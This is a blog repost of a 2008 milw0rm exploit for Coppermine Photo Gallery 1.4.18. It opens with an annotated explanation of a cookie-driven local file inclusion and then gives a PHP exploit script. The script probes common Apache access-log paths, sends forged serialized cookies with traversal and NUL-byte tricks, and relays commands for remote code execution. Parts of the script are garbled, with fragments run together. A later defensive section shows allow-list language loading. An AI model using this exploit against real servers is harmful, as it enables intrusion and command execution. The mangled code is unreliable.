Wednesday, August 6, 2008

Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit

authenticate();

[...]

301. // Process language selection if present in URI or in user profile or try
302. // autodetection if default charset is utf-8
303. if (!empty($_GET['lang']))
304. {
305. $USER['lang'] = ereg("^[a-z0-9_-]*$", $_GET['lang']) ? $_GET['lang'] : $CONFIG['lang'];
306. }
307.
308. if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
309. {
310. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
311. $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
312. }
313. elseif ($CONFIG['charset'] == 'utf-8') <====== [2]
314. {
315. include('include/select_lang.inc.php');
316. if (file_exists('lang/' . $USER['lang'] . '.php'))
317. {
318. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
319. $CONFIG['lang'] = $USER['lang'];
320. }
321. }
322. else
323. {
324. unset($USER['lang']);
325. }
326.
327. if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))
328. {
329. unset($CONFIG['default_lang']);
330. }
331.
332. if (!file_exists("lang/{$CONFIG['lang']}.php"))
333. $CONFIG['lang'] = 'english';
334.
335. // We load the chosen language file
336. require "lang/{$CONFIG['lang']}.php"; <======== [3]

If $CONFIG['charset'] is set to 'utf-8' [2] (this is the default configuration), an attacker could include an arbitrary local file through the require() at line 336 [3], because the $USER array can be manipulated through cookies (see the user_get_profile() function [1] defined in /include/functions.inc.php, near lines 128-146).

[-] Path disclosure in /themes/sample/theme.php

[-] Possible bug fix in /include/functions.inc.php

128. function user_get_profile()
129. {
130. global $CONFIG, $USER;
131.
132. if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) {
133. $USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data']));
134. $USER['lang'] = ereg("^[a-z0-9_-]*$", $USER['lang']) ? $USER['lang'] : $CONFIG['lang'];
135.
} */

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}

function get_info()
{
global $host, $path, $cookie, $version, $path_disc;
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
preg_match("/Set-Cookie: (.*)_data/", $html, $match);
$cookie = $match[1];
preg_match("/(.*)themes/", http_send($host, $packet), $match);
$path_disc = $match[1];
}

function get_logs()
{
$logs[] = "/apache/logs/access.log";
$logs[] = "/apache2/logs/access.log";
$logs[] = "/apache/log/access.log";
$logs[] = "/apache2/log/access.log";
$logs[] = "/logs/access.log";
$logs[] = "/var/log/apache/access.log";
$logs[] = "/var/log/apache2/access.log";
$logs[] = "/var/log/access.log";
$logs[] = "/var/www/logs/access.log";
$logs[] = "/var/www/log/access.log";
$logs[] = "/var/log/httpd/access.log";
$logs[] = "/etc/httpd/logs/access.log";
$logs[] = "/usr/local/apache/logs/access.log";
$logs[] = "/usr/local/apache2/logs/access.log";

for ($i = 0, $climb = "../.."; $i < packet = "GET {$path}proof.php HTTP/1.0\r\n" logs =" get_logs();" data =" base64_encode(serialize(array("> md5(time()), "am" => 1, "lang" => $_log.chr(0))));

$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$cookie}_data={$data}\r\n";
$packet .= "Connection: close\r\n\r\n";
$resp = http_send($host, $packet);

if (!preg_match("/f=fopen/", $resp) && preg_match("/_LfI_/", $resp)) return true;

sleep(1);
}

return false;
}

print "\n+-------------------------------------------------------------------------+";
print "\n| Coppermine Photo Gallery <= 1.4.18 LFI / Code Execution Exploit by EgiX |"; print "\n+-------------------------------------------------------------------------+\n"; if ($argc < host =" $argv[1];" path =" $argv[2];" code =" base64_decode(" packet = "GET {$path}{$code} HTTP/1.0\r\n" cmd =" trim(fgets(STDIN));" packet = "GET {$path}proof.php HTTP/1.0\r\n">

# milw0rm.com [2008-07-31]
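The root cause in the advisory above is that the language name reaches require() after passing only a binary-unsafe ereg() check and a file_exists() probe on a user-built path, with the value taken from an unserialized cookie. As an added defensive example (not code from the milw0rm post and not Coppermine's own code), the loader below decides what to require by membership in an allow-list derived from the lang/ directory, rejects NUL bytes and any non-token characters up front, and takes the request only from the query string, never from the cookie array. It assumes language files live under lang/<name>.php as on the page; the function names, the 32-character length bound and the demo values are my own.

```php
<?php
// Added example, not Coppermine's code: allow-list based language selection.
// Assumes language files are stored as <langDir>/<name>.php, as on the page.

// Build the allow-list from the filesystem, so only names that actually exist
// as language files can ever be returned.
function available_languages(string $langDir): array
{
    $langs = [];
    foreach (glob($langDir . '/*.php') ?: [] as $file) {
        $langs[] = basename($file, '.php');
    }
    return $langs;
}

// Validate the requested name and map it onto the allow-list. Anything that is
// not a short plain token falls back to the default; the NUL check is explicit
// because the ereg() used on the page stops at the first NUL byte.
function select_language(?string $requested, string $default, array $allowed): string
{
    if ($requested === null
        || strpos($requested, "\0") !== false
        || !preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested)) {
        return $default;
    }
    // Strict in_array(): membership in the list, not a file_exists() probe on
    // a path the user assembled, decides what gets required.
    return in_array($requested, $allowed, true) ? $requested : $default;
}

// Load the chosen language file and report which one was used.
function load_language(string $langDir, ?string $requested, string $default): string
{
    $lang = select_language($requested, $default, available_languages($langDir));
    require $langDir . '/' . $lang . '.php';
    return $lang;
}

// Intended call site: the value comes from the query string only; the
// unserialized cookie array ($USER on the page) is never consulted.
// $lang = load_language(__DIR__ . '/lang', $_GET['lang'] ?? null, $CONFIG['lang']);

// Self-contained demo with constructed language files in a temp directory.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
    mkdir($dir, 0700);
    file_put_contents($dir . '/english.php', "<?php\n");
    file_put_contents($dir . '/italian.php', "<?php\n");

    // Constructed inputs => language the loader should actually require.
    $cases = [
        'italian'               => 'italian',   // allow-listed name
        '../../some/other/file' => 'english',   // slashes and dots rejected
        "italian\0"             => 'english',   // embedded NUL rejected
        'klingon'               => 'english',   // well-formed but not on disk
    ];
    foreach ($cases as $in => $expected) {
        $got = load_language($dir, $in, 'english');
        printf("%-24s -> %-8s %s\n", addcslashes($in, "\0"), $got,
               $got === $expected ? 'ok' : 'FAIL');
    }

    array_map('unlink', glob($dir . '/*.php') ?: []);
    rmdir($dir);
}
```

Run it with `php` on the command line; each constructed input prints the language that was actually required, so the traversal, NUL and unknown-name cases are all visibly collapsed to the default. The design point is that the set of loadable files is enumerated by the application, and user input is only ever used as a lookup key into that set.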

